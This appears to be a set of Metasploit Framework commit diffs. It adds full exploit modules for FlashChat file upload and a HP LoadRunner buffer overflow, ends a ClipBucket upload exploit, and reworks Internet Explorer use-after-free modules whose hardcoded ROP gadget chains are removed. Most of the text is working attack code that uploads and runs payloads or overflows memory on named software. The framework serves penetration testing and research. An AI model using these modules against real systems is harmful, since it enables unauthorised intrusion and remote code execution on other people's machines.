peer = "#{rhost}:#{rport}"
print_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "")
})
if res and res.code == 200 and res.body =~ /ClipBucket version (\d+\.\d+)/
version = $1
else
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version #{version} detected")
if version > "2.6"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
peer = "#{rhost}:#{rport}"
payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"
print_status("#{peer} - Uploading payload [ #{payload_name} ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
'headers' => { 'Content-Type' => 'text/plain' },
'vars_get' => { 'name' => payload_name },
'data' => payload.encoded
})
# If the server returns 200 we assume we uploaded the malicious
# file successfully
if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
end
register_files_for_cleanup(payload_name)
print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response, probably the exploit failed")
end
end
end

View File

@ -0,0 +1,147 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "FlashChat Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in FlashChat
versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload
feature in order to upload malicious PHP files without authentication
which results in arbitrary remote code execution as the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'x-hayben21', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['OSVDB', '98233'],
['EDB', '28709']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on FlashChat version 6.0.8
[ 'Generic (PHP Payload)', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 04 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
], self.class)
end
#
# Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
#
def check
uri = normalize_uri(target_uri.path, '')
res = send_request_raw({'uri' => uri})
if not res
print_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
version = res.body.scan(/<title>FlashChat v([\d\.]+)/).flatten[0] || ''
if version.empty?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version found: #{version}")
if version =~ /6\.0\.(2|4|5|6|7|8)/
return Exploit::CheckCode::Vulnerable
elsif version <= "6.0.8"
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Uploads our malicious file
# Stolen from havalite_upload_exec.rb
#
def upload(base)
fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
php = "<?php #{payload.encoded} ?>"
data = Rex::MIME::Message.new
data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - No upload.php found")
elsif res.code.to_i == 500
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
end
return fname
end
#
# Executes our uploaded malicious file
# Stolen from havalite_upload_exec.rb
#
def exec(base, payload_fname)
res = send_request_raw({
'uri' => normalize_uri(base, 'temp', payload_fname)
})
if res and res.code == 404
fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
end
end
def exploit
base = target_uri.path
# upload
print_status("#{peer} - Uploading malicious file...")
fname = upload(base)
# register the file to clean
register_files_for_cleanup(fname)
# exec
print_status("#{peer} - Executing #{fname}...")
exec(base, fname)
end
end

View File

@ -11,6 +11,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
@ -62,39 +63,9 @@ class Metasploit4 < Msf::Exploit::Remote
end
def get_payload(t)
p = ''
rop =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
p << rop
p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
p << payload.encoded
p
alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
return p
end

View File

@ -135,100 +135,27 @@ class Metasploit3 < Msf::Exploit::Remote
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Make post code execution more stable
code << rand_text_alpha(12000)
msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
java_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_payload = ''
case t['Rop']
when :msvcrt
case t.name
when 'IE 8 on Windows XP SP3'
rop_gadgets =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
when 'IE 8 on Windows Server 2003'
rop_gadgets =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
end
else
rop_gadgets =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
rop_payload = generate_rop_payload('java', java_align + code)
end
rop_payload = rop_gadgets
case t['Rop']
when :msvcrt
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
else
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
end
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
return rop_payload
rop_payload
end
def load_exploit_html(my_target, cli)

View File

@ -117,76 +117,22 @@ class Metasploit3 < Msf::Exploit::Remote
def get_payload(t, cli)
rop_payload = ''
# Extra junk in the end to make sure post code execution is stable.
p = payload.encoded
case t['Rop']
when :msvcrt
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = ''
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = ''
if t.name == 'IE 8 on Windows XP SP3'
chain =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
elsif t.name == 'IE 8 on Windows Server 2003'
junk = rand_text_alpha(4).unpack("V")[0].to_i
nop = make_nops(4).unpack("V")[0].to_i
chain =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
end
rop_payload = chain + algin + payload.encoded
else
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << payload.encoded
code << p
code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code)

View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Micorosft Internet Explorer SetMouseCapture Use-After-Free",
'Name' => "Microsoft Internet Explorer SetMouseCapture Use-After-Free",
'Description' => %q{
This module exploits a use-after-free vulnerability that currents targets Internet
Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.
@ -49,6 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2013-3893' ],
[ 'OSVDB', '97380' ],
[ 'MSB', 'MS13-080' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ]
@ -342,4 +343,4 @@ MSHTML!CTreeNode::GetInterface+0xd8:
66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]
66e13e01 ffd0 call eax
=end
=end

View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
@ -109,85 +110,25 @@ class Metasploit3 < Msf::Exploit::Remote
nil
end
def get_payload(t, cli)
rop = ''
code = payload.encoded
esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
case t['Rop']
when :msvcrt
# Stack adjustment # add esp, -3500
esp_align = "\x81\xc4\x54\xf2\xff\xff"
def get_payload(t)
if t['Rop'] == :msvcrt
print_status("Using msvcrt ROP")
rop =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
esp_align = "\x81\xc4\x54\xf2\xff\xff"
rop_dll = 'msvcrt'
opts = {'target'=>'xp'}
else
print_status("Using JRE ROP")
rop =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_dll = 'java'
opts = {}
end
rop_payload = rop
rop_payload << esp_align
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
rop_payload
end
def junk
rand_text_alpha(4).unpack("V")[0].to_i
end
def nop
make_nops(4).unpack("V")[0].to_i
p = esp_align + payload.encoded + rand_text_alpha(12000)
generate_rop_payload(rop_dll, p, opts)
end
def get_html(t, p)
junk = rand_text_alpha(4).unpack("V")[0].to_i
js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
js_payload = Rex::Text.to_unescape(p)
js_align = Rex::Text.to_unescape([t['Align']].pack("V*"))
@ -195,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
q_id = Rex::Text.rand_text_alpha(1)
html = %Q|
%Q|
<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
@ -244,8 +185,6 @@ class Metasploit3 < Msf::Exploit::Remote
<t:ANIMATECOLOR id="myanim"/>
</html>
|
html
end
def on_request_uri(cli, request)
@ -253,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
t = get_target(agent)
if t
p = get_payload(t, cli)
p = get_payload(t)
html = get_html(t, p)
print_status("Sending exploit...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})

View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
@ -106,32 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
def get_payload(t)
rop =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
# This data should appear at the beginning of the target address (see TargetAddr in metadata)
p = ''
p << rand_text_alpha(225) # Padding to avoid null byte addr
@ -139,10 +114,9 @@ class Metasploit3 < Msf::Exploit::Remote
p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr)
p << [t['Pivot']].pack("V*") # Stack pivot
p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment
p << rop # ROP chain
p << payload.encoded # Actual payload
p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
return p
p
end

View File

@ -26,9 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",
'Name' => "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",
'Description' => %q{
This module exploits the SEListCtrlX ActiveX installed with the SIEMENS Solid Edge product.
This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.
The vulnerability exists on several APIs provided by the control, where user supplied input
is handled as a memory pointer without proper validation, allowing an attacker to read and
corrupt memory from the target process. This module abuses the methods NumChildren() and
@ -497,4 +497,4 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
end

View File

@ -81,9 +81,7 @@ class Metasploit3 < Msf::Exploit::Local
print_good "UAC is set to Default"
print_good "BypassUAC can bypass this setting, continuing..."
when 0
print_error "UAC is not enabled, no reason to run module"
print_error "Run exploit/windows/local/ask to elevate"
return
print_warning "Could not determine UAC level - attempting anyways..."
end
# Check if you are an admin

View File

@ -0,0 +1,83 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP LoadRunner magentproc.exe Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' =>
[
'Unknown', # Original discovery # From Tenable Network Security
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-4800'],
['OSVDB', '95644'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
],
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'SSL3',
'PrependMigrate' => true
},
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows XP SP3 / HP LoadRunner 11.50',
{
# magentproc.exe 11.50.2042.0
'Offset' => 1104,
'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
'Crash' => 6000 # Length needed to ensure an exception
}
]
],
'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(443)], self.class)
end
def exploit
req = [0xffffffff].pack("N") # Fake Length
req << rand_text(target['Offset'])
req << generate_seh_record(target.ret)
req << payload.encoded
req << rand_text(target['Crash'])
connect
print_status("Sending malicious request...")
sock.put(req)
disconnect
end
end

View File

@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
connect
sock.put(ping_request)
res = sock.get_once(-1, 1)
res = sock.get_once
disconnect
return res
@ -162,7 +162,7 @@ user-agent: BBC 11.00.044; 14
print_status("#{peer} - Sending HTTP Expect...")
sock.put(http_headers)
res = sock.get_once(-1, 1)
res = sock.get_once
if not res or res !~ /HTTP\/1\.1 100 Continue/
print_error("#{peer} - Failed while sending HTTP Expect Header")
return

View File

@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
connect
sock.put(ping_request)
res = sock.get_once(-1, 1)
res = sock.get_once
disconnect
return res
@ -162,7 +162,7 @@ user-agent: BBC 11.00.044; 14
print_status("#{peer} - Sending HTTP Expect...")
sock.put(http_headers)
res = sock.get_once(-1, 1)
res = sock.get_once
if not res or res !~ /HTTP\/1\.1 100 Continue/
print_error("#{peer} - Failed while sending HTTP Expect Header")
return

View File

@ -17,7 +17,7 @@ module Metasploit3
'Name' => 'OS X x64 Execute Command',
'Description' => 'Execute an arbitrary command',
'Author' => [ 'argp <argp[at]census-labs.com>',
'joev <jvennix[at]rapid7.com>' ],
'joev' ],
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64

View File

@ -30,7 +30,7 @@ module Metasploit3
[
'snagg <snagg[at]openssl.it>',
'argp <argp[at]census-labs.com>',
'joev <jvennix[at]rapid7.com>'
'joev'
],
'License' => BSD_LICENSE,
'Platform' => 'osx',

View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
'Author' =>
[
"Jann Horn", # discovery
"joev <jvennix[at]rapid7.com>" # metasploit module
"joev" # metasploit module
],
'DisclosureDate' => 'Nov 20 2012',
'Platform' => %w{ linux osx }

View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post
command using -e, so the payload never hits the disk.
},
'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'],
'Author' => [ 'joev'],
'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ]
))

View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post
'License' => MSF_LICENSE,
'Author' => [
'Joff Thyer <jsthyer[at]gmail.com>', # original post module
'joev <jvennix[at]rapid7.com>' # bug fixes
'joev' # bug fixes
],
'Platform' => [ 'osx' ],
'References' => [

View File

@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
capture (with the RECORD action) audio inputs on a remote OSX machine.
},
'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'],
'Author' => [ 'joev'],
'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Actions' => [

View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
record a webcam and mic (with the RECORD action)
},
'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'],
'Author' => [ 'joev'],
'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Actions' => [

View File

@ -14,9 +14,9 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather Dyn-Dns Client Password Extractor',
'Name' => 'Windows Gather DynDNS Client Password Extractor',
'Description' => %q{
This module extracts the username, password, and hosts for Dyn-Dns version 4.1.8.
This module extracts the username, password, and hosts for DynDNS version 4.1.8.
This is done by downloading the config.dyndns file from the victim machine, and then
automatically decode the password field. The original copy of the config file is also
saved to disk.

View File

@ -92,7 +92,7 @@ class Metasploit3 < Msf::Post
print_good("Successfully injected Meterpreter in to process: #{target_pid}")
